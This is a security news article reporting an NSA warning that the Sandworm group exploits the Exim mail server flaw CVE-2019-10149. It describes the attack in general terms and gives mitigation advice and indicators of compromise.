Russian Government Hackers Actively Exploit Exim Mail Server Flaw Since 2019

The US National Security Agency (NSA) issued a security warning notice about a new wave of cyberattacks on mail servers on May 28. since last August, a team of cybercriminal known as Sandworm has been attacking the servers on which Exim Mail Transfer Agent (MTA) software is installed. 

It’s the same hacker group that interfered in the 2016 US presidential election, triggering an attack of devastating malware the following year. In this event, the attackers have exploited the popular vulnerability CVE-2019-10149, which allows remote code execution of their own choice.

According to the security experts, the vulnerability CVE-2019-10149 was actually discovered in June 2019, and the cybercriminals have started actively exploiting this security flaw again during the recent week.

Exim is an MTA (Mail Transfer Agent) software that is generally used in Unix-based machines, and not only that even it also comes pre-installed on some Linux distributions like Debian. Apart from this, in Exim version 4.87, the remote code execution security flaw was introduced.

Here the hackers take advantage of the slip and get access to the application using an email created specifically for that purpose. After exploiting the vulnerability, a shell script gets loaded and executed from the domain controlled by the attackers to the attacked system.

In short, by sending a command in the “MAIL FROM” field of a Simple Mail Transfer Protocol message (SMTP), the attackers simply exploit the victims using the Exim software on their public-facing Mail Transfer Agents.

The shell script that is used by the Russian hacking group that is part of the General Staff Main Intelligence Directorate’s (GRU) Main Center for Special Technologies (GTsST) can do the following things on the victim’s system:-

  • Add new privileged users.
  • Disable network security settings.
  • Update SSH configuration to enable additional remote access.
  • Execute an additional script to enable follow-on exploitation

Mitigation actions users should follow

  • Apply Exim Updates Immediately.
  • Detect Exploit Attempts and Unauthorized Changes.
  • Apply the Defense-in-Depth Security Strategy.

The US National Security Agency has strongly recommended that both private and state-owned organizations should immediately upgrade their Exim servers to 4.93 and check for the Indicators of Compromise (IOC) that are listed in the NSA security notice.

Here are the IP addresses and domains that were used by the Sandworm hacking group to execute all these attacks:-

  • 95.216.13.196
  • 103.94.157.5
  • hostapp.be

The activity of the Sandworm hacking group began in the mid-2000s, and it is believed that this group is the actual developer of the BlackEnergy malware that attacked Ukrainian electricity companies in December 2015 and 2016. 

Moreover, the security experts believe that this group is also responsible for creating the dangerous malware like NotPetya extortion software, that has caused billions in losses globally.

So, what do you think about this? Share all your views and thoughts in the comment section below.

Also Read:

Hackers Are Exploiting These Web Application Vulnerabilities to Install Persistent Backdoor – NSA

FBI and DHS Share List of Top 10 Most Exploited Vulnerabilities

BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.